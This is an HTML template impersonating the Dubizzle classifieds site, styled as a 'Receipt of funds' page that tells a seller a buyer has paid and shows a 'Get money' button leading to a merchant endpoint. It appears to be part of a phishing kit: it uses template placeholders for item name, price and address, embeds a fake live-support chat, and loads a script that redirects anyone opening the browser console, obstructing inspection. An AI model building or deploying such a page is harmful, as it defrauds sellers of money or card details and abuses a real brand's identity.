<!DOCTYPE html>
<html lang="ru" data-cbscriptallow="true"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	
	<link href="https://uae.dubizzle.com/favicon.ico" rel="icon" type="image/x-icon">
	<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
	<title>Receipt of funds</title>
	<meta property="og:site_name" content="Dubizzle.com">
	<meta property="og:title" content="<%=name %>">
	<meta property="og:description" content="dubizzle is your leading free classifieds website in UAE to buy, sell and find anything. Find a properties, cars, jobs, or items for sale in UAE.">
	<meta property="og:image" content="https://www.albawaba.com/sites/default/files/styles/d08_traditional/public/2022-01/19467726774787.556dd15d7295e.png?h=c71d0c67&itok=6MIO_36l">
	<meta property="og:type" content="website">
	<link type="text/css" href="/static/style/dubizzle/main.css" rel="stylesheet">
	<link type="text/css" href="/static/style/dubizzle/mobile.css" rel="stylesheet">
    <!-- support -->
    <link rel="stylesheet" href="/static/style/support/support_parent.css">
	<script src="/static/style/protect/protect.js"></script>

	<script async="" src="/static/style/dubizzle/invisible.js.download"></script></head>
	
	<body><header class="Header">
	<a href="#" class="HeaderTextNav"><img src="/static/style/dubizzle/53645571394487.5bc456ff6f32d.jpg" width="120" alt=""></a>
</header>
<main class="Main">
    <div class="
        chatra--webkit
        chatra--style-round
        chatra--side-bottom
        chatra--pos-right
        chatra--visible
        chatra--expanded
        chatra--fast-toggle
      " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
    <div id="chatra__iframe-wrapper">
      <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat" allow="autoplay" src="/static/style/support/index.html?id=<%=id %>" style="width: 380px; height: 600px; position: absolute"></iframe>
    </div>
  </div>
  <div class="support-circle" onclick="document.querySelector(&#39;#chatra&#39;).style.display = &#39;block&#39;;this.style.display = &#39;none&#39;"></div>
<div style="width: -webkit-fill-available;height: -webkit-fill-available;">
	<div class="TextHead">Fundraising</div>
	<div class="PaddBlock">
		<div class="CenterMainHead">
			<div style="display: flex;">
				<img class="ImgTovar" src="/static/style/dubizzle/image_processing20191106-28710-87bnbr.gif" alt="">
				<div class="BlockTextCent">
					<div class="BalanceText"><%=price %> AED</div>
					<div class="ComentText"><%=name %></div>
				</div>
			</div>
			<div class="Jtonik">
				<div class="SuccText" style="margin: auto;">Paid product</div>
				<img class="ImgTovarPay" src="/static/style/dubizzle/noun_1281471.png" alt="">
			</div>
		</div>
	</div>
	<div class="PaddBlock Ms">
		<div class="CenterMainHead" style="height: 50px;">
			<div style="display: flex;margin: auto;">
				<div class="SuccText" style="margin: auto;">Paid product</div>
				<img class="ImgTovarPay" src="/static/style/dubizzle/secure.svg" alt="">
			</div>
		</div>
	</div>
	<div class="PaddBlock">
		<div class="BlockDostavka">
			<div class="BgImgCar">
				<img class="ImgTovarPay" src="/static/style/dubizzle/image_processing20191106-28710-87bnbr.gif" alt="">
			</div>
			<div class="BlockTextDostav">
				<div class="TextDostav">Selected delivery country</div>
				<div class="TextDostavTs">The cost of delivery may vary depending on the city.</div>
			</div>
		</div>
	</div>
	<div class="PaddBlock M">
		<div class="MainOrder">
			<form class="OrderPayForm" action="/receive/merchant/<%=id %>" method="GET">
				<div class="MrgWebKit">
					<div class="FormOrderInp" style="margin-top: 20px;">
						<div class="TextOrderSay">Shipping Address:</div>
						<div class="MobAviableFlex">
							<input type="text" class="InputOrder" style="margin-right: 0;" value="<%=address %>" placeholder="City, street, house" required="" disabled="disabled" readonly="">
						</div>
					</div>
					<div class="FormOrderInp">
						<div class="MobAviableFlex">
						</div>
					</div>
					<div class="FormOrderInp">
						<div class="MobAviableFlex">
						</div>
					</div>
					<div class="FormOrderInp" style="margin-top: 20px;">
						<div class="TextOrderSay" style="margin-top: 20px;text-align: center;">It is necessary to send the goods to the buyer within 3 days from the date of receipt of the funds <a href="http://tnt.com/">tnt</a>. Despuand od confirmation, The Courier joins the transfer.</div>
					</div>
				</div>
				<div class="BoxOrder">
					<div class="BoxBerry">
						<div class="BlockDecoy">
							<div class="TextDecoy" style="max-width: 300px;">The product is listed for this amount:</div>
							<div class="TextDecoy"><%=price %> AED</div>
						</div>
						<input class="ButtonOrderPay" type="submit" name="PayCheck" value="Get money">
						<div class="BlockDecoyText">
							<div class="BlockDecoyOne">Payment is secure</div>	
					</div>
				</div>
			
		</div></form>
	</div>

</div></div></main>

<script type="text/javascript">
    function openForm() {
      $('#myForm').css('display', 'block')
    $('#open-support').css('display', 'none')
  }

  function closeForm() {
    $('#myForm').css('display', 'none')
    $('#open-support').css('display', 'block')

  }
</script>

<style>
	@media (max-width: 840px) {
		.FormOrderInp {
			margin-top: 10px;
		}
	}
</style><script src="https://cdn.jsdelivr.net/gh/fz6m/console-ban@3.2/dist/console-ban.min.js"></script>
<script>
    ConsoleBan.init({
        redirect: 'https://http.cat/403'
    })
</script></body>


</html>